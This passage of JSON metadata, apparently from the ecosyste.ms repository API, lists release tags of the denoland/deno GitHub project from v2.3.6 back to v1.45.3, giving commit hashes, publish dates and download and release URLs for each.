dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts